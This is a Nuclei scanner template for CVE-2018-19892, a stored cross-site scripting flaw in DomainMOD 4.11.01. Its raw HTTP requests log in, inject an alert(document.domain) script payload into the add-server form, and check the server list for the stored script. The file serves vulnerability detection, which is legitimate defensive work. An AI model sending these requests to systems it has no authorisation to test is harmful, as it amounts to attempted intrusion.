nuclei-templates/cves/2018/CVE-2018-19892.yaml

59 lines
1.5 KiB
YAML

id: CVE-2018-19892
info:
name: DomainMOD 4.11.01 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
reference:
- https://www.exploit-db.com/exploits/45959
- https://github.com/domainmod/domainmod/issues/85
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2018-19892
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2018,domainmod,xss,authenticated
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
- |
POST /admin/dw/add-server.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=
- |
GET /admin/dw/servers.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script></a>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200